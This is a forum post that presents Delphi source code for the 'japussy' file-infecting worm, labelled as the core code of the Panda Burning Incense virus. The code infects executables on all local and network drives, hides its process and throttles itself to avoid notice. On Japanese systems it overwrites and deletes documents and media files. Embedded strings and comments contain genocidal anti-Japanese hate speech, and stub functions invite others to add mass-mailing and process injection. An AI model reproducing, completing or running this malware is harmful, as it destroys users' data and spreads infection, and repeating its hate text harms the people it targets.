熊猫烧香核心代码
<P>program japussy;<BR>uses<BR>windows, sysutils, classes, graphics, shellapi{, registry};<BR>const<BR>headersize = 82432; //病毒体的大小<BR>iconoffset = $12eb8; //pe文件主图标的偏移量</P><P>//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同<BR>//查找2800000020的十六进制字符串可以找到主图标的偏移量<BR> <BR>{<BR>headersize = 38912; //upx压缩过病毒体的大小<BR>iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量</P>
<P>//upx 1.24w 用法: upx -9 --8086 japussy.exe<BR>}<BR>iconsize = $2e8; //pe文件主图标的大小--744字节<BR>icontail = iconoffset + iconsize; //pe文件主图标的尾部<BR>id = $44444444; //感染标记</P>
<P>//垃圾码,以备写入<BR>catchword = 'if a race need to be killed out, it must be yamato. ' +<BR> 'if a country need to be destroyed, it must be japan! ' +<BR> '*** w32.japussy.worm.a ***';<BR>{$r *.res}<BR>function registerserviceprocess(dwprocessid, dwtype: integer): integer; <BR>stdcall; external 'kernel32.dll'; //函数声明<BR>var<BR>tmpfile: string;<BR>si: startupinfo;<BR>pi: process_information;<BR>isjap: boolean = false; //日文操作系统标记<BR>{ 判断是否为win9x }<BR>function iswin9x: boolean;<BR>var<BR>ver: tosversioninfo;<BR>begin<BR>result := false;<BR>ver.dwosversioninfosize := sizeof(tosversioninfo);<BR>if not getversionex(ver) then<BR> exit;<BR>if (ver.dwplatformid = ver_platform_win32_windows) then //win9x<BR> result := true;<BR>end;<BR>{ 在流之间复制 }<BR>procedure copystream(src: tstream; sstartpos: integer; dst: tstream;<BR>dstartpos: integer; count: integer);<BR>var<BR>scurpos, dcurpos: integer;<BR>begin<BR>scurpos := src.position;<BR>dcurpos := dst.position;<BR>src.seek(sstartpos, 0);<BR>dst.seek(dstartpos, 0);<BR>dst.copyfrom(src, count);<BR>src.seek(scurpos, 0);<BR>dst.seek(dcurpos, 0);<BR>end;<BR>{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }<BR>procedure extractfile(filename: string);<BR>var<BR>sstream, dstream: tfilestream;<BR>begin<BR>try<BR> sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);<BR> try<BR> dstream := tfilestream.create(filename, fmcreate);<BR> try<BR> sstream.seek(headersize, 0); //跳过头部的病毒部分<BR> dstream.copyfrom(sstream, sstream.size - headersize);<BR> finally<BR> dstream.free;<BR> end;<BR> finally<BR> sstream.free;<BR> end;<BR>except<BR>end;<BR>end;<BR>{ 填充startupinfo结构 }<BR>procedure fillstartupinfo(var si: startupinfo; state: word);<BR>begin<BR>si.cb := sizeof(si);<BR>si.lpreserved := nil;<BR>si.lpdesktop := nil;<BR>si.lptitle := nil;<BR>si.dwflags := startf_useshowwindow;<BR>si.wshowwindow := state;<BR>si.cbreserved2 := 0;<BR>si.lpreserved2 := nil;<BR>end;<BR>{ 发带毒邮件 }<BR>procedure sendmail;<BR>begin<BR>//哪位仁兄愿意完成之?<BR>end;<BR>{ 感染pe文件 }<BR>procedure infectonefile(filename: string);<BR>var<BR>hdrstream, srcstream: tfilestream;<BR>icostream, dststream: tmemorystream;<BR>iid: longint;<BR>aicon: ticon;<BR>infected, ispe: boolean;<BR>i: integer;<BR>buf: array[0..1] of char;<BR>begin<BR>try //出错则文件正在被使用,退出<BR> if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染<BR> exit;<BR> infected := false;<BR> ispe := false;<BR> srcstream := tfilestream.create(filename, fmopenread);<BR> try<BR> for i := 0 to $108 do //检查pe文件头<BR> begin<BR> srcstream.seek(i, sofrombeginning);<BR> srcstream.read(buf, 2);<BR> if (buf[0] = #80) and (buf[1] = #69) then //pe标记<BR> begin<BR> ispe := true; //是pe文件<BR> break;<BR> end;<BR> end;<BR> srcstream.seek(-4, sofromend); //检查感染标记<BR> srcstream.read(iid, 4);<BR> if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染<BR> infected := true;<BR> finally<BR> srcstream.free;<BR> end;<BR> if infected or (not ispe) then //如果感染过了或不是pe文件则退出<BR> exit;<BR> icostream := tmemorystream.create;<BR> dststream := tmemorystream.create;<BR> try<BR> aicon := ticon.create;<BR> try<BR> //得到被感染文件的主图标(744字节),存入流<BR> aicon.releasehandle;<BR> aicon.handle := extracticon(hinstance, pchar(filename), 0);<BR> aicon.savetostream(icostream);<BR> finally<BR> aicon.free;<BR> end;<BR> srcstream := tfilestream.create(filename, fmopenread);<BR> //头文件<BR> hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);<BR> try<BR> //写入病毒体主图标之前的数据<BR> copystream(hdrstream, 0, dststream, 0, iconoffset);<BR> //写入目前程序的主图标<BR> copystream(icostream, 22, dststream, iconoffset, iconsize);<BR> //写入病毒体主图标到病毒体尾部之间的数据<BR> copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);<BR> //写入宿主程序<BR> copystream(srcstream, 0, dststream, headersize, srcstream.size);<BR> //写入已感染的标记<BR> dststream.seek(0, 2);<BR> iid := $44444444;<BR> dststream.write(iid, 4);<BR> finally<BR> hdrstream.free;<BR> end;<BR> finally<BR> srcstream.free;<BR> icostream.free;<BR> dststream.savetofile(filename); //替换宿主文件<BR> dststream.free;<BR> end;<BR>except;<BR>end;<BR>end;<BR>{ 将目标文件写入垃圾码后删除 }<BR>procedure smashfile(filename: string);<BR>var<BR>filehandle: integer;<BR>i, size, mass, max, len: integer;<BR>begin<BR>try<BR> setfileattributes(pchar(filename), 0); //去掉只读属性<BR> filehandle := fileopen(filename, fmopenwrite); //打开文件<BR> try<BR> size := getfilesize(filehandle, nil); //文件大小<BR> i := 0;<BR> randomize;<BR> max := random(15); //写入垃圾码的随机次数<BR> if max < 5 then<BR> max := 5;<BR> mass := size div max; //每个间隔块的大小<BR> len := length(catchword);<BR> while i < max do<BR> begin<BR> fileseek(filehandle, i * mass, 0); //定位<BR> //写入垃圾码,将文件彻底破坏掉<BR> filewrite(filehandle, catchword, len);<BR> inc(i);<BR> end;<BR> finally<BR> fileclose(filehandle); //关闭文件<BR> end;<BR> deletefile(pchar(filename)); //删除之<BR>except<BR>end;<BR>end;<BR>{ 获得可写的驱动器列表 }<BR>function getdrives: string;<BR>var<BR>disktype: word;<BR>d: char;<BR>str: string;<BR>i: integer;<BR>begin<BR>for i := 0 to 25 do //遍历26个字母<BR>begin<BR> d := chr(i + 65);<BR> str := d + ':\';<BR> disktype := getdrivetype(pchar(str));<BR> //得到本地磁盘和网络盘<BR> if (disktype = drive_fixed) or (disktype = drive_remote) then<BR> result := result + d;<BR>end;<BR>end;<BR>{ 遍历目录,感染和摧毁文件 }<BR>procedure loopfiles(path, mask: string);<BR>var<BR>i, count: integer;<BR>fn, ext: string;<BR>subdir: tstrings;<BR>searchrec: tsearchrec;<BR>msg: tmsg;<BR>function isvaliddir(searchrec: tsearchrec): integer;<BR>begin<BR> if (searchrec.attr <> 16) and (searchrec.name <> '.') and<BR> (searchrec.name <> '..') then<BR> result := 0 //不是目录<BR> else if (searchrec.attr = 16) and (searchrec.name <> '.') and<BR> (searchrec.name <> '..') then<BR> result := 1 //不是根目录<BR> else result := 2; //是根目录<BR>end;<BR>begin<BR>if (findfirst(path + mask, faanyfile, searchrec) = 0) then<BR>begin<BR> repeat<BR> peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑<BR> if isvaliddir(searchrec) = 0 then<BR> begin<BR> fn := path + searchrec.name;<BR> ext := uppercase(extractfileext(fn));<BR> if (ext = '.exe') or (ext = '.scr') then<BR> begin<BR> infectonefile(fn); //感染可执行文件 <BR> end<BR> else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then<BR> begin<BR> //感染html和asp文件,将base64编码后的病毒写入<BR> //感染浏览此网页的所有用户<BR> //哪位大兄弟愿意完成之?<BR> end<BR> else if ext = '.wab' then //outlook地址簿文件<BR> begin<BR> //获取outlook邮件地址<BR> end<BR> else if ext = '.adc' then //foxmail地址自动完成文件<BR> begin<BR> //获取foxmail邮件地址<BR> end<BR> else if ext = 'ind' then //foxmail地址簿文件<BR> begin<BR> //获取foxmail邮件地址<BR> end<BR> else <BR> begin<BR> if isjap then //是倭文操作系统<BR> begin<BR> if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or<BR> (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or<BR> (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or<BR> (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or<BR> (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or<BR> (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then<BR> smashfile(fn); //摧毁文件<BR> end;<BR> end;<BR> end;<BR> //感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑<BR> sleep(200);<BR> until (findnext(searchrec) <> 0);<BR>end;<BR>findclose(searchrec);<BR>subdir := tstringlist.create;<BR>if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then<BR>begin<BR> repeat<BR> if isvaliddir(searchrec) = 1 then<BR> subdir.add(searchrec.name);<BR> until (findnext(searchrec) <> 0);<BR> end;<BR>findclose(searchrec);<BR>count := subdir.count - 1;<BR>for i := 0 to count do<BR> loopfiles(path + subdir.strings + '\', mask);<BR>freeandnil(subdir);<BR>end;<BR>{ 遍历磁盘上所有的文件 }<BR>procedure infectfiles;<BR>var<BR>driverlist: string;<BR>i, len: integer;<BR>begin<BR>if getacp = 932 then //日文操作系统<BR> isjap := true; //去死吧!<BR>driverlist := getdrives; //得到可写的磁盘列表<BR>len := length(driverlist);<BR>while true do //死循环<BR>begin<BR> for i := len downto 1 do //遍历每个磁盘驱动器<BR> loopfiles(driverlist + ':\', '*.*'); //感染之<BR> sendmail; //发带毒邮件<BR> sleep(1000 * 60 * 5); //睡眠5分钟<BR>end;<BR>end;<BR>{ 主程序开始 }<BR>begin<BR>if iswin9x then //是win9x<BR> registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程<BR>else //winnt<BR>begin<BR> //远程线程映射到explorer进程<BR> //哪位兄台愿意完成之?<BR>end;<BR>//如果是原始病毒体自己<BR>if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then<BR> infectfiles //感染和发邮件<BR>else //已寄生于宿主程序上了,开始工作<BR>begin<BR> tmpfile := paramstr(0); //创建临时文件<BR> delete(tmpfile, length(tmpfile) - 4, 4);<BR> tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格<BR> extractfile(tmpfile); //分离之<BR> fillstartupinfo(si, sw_showdefault);<BR> createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,<BR> 0, nil, '.', si, pi); //创建新进程运行之<BR> infectfiles; //感染和发邮件<BR>end;<BR>end. </P>
页:
[1]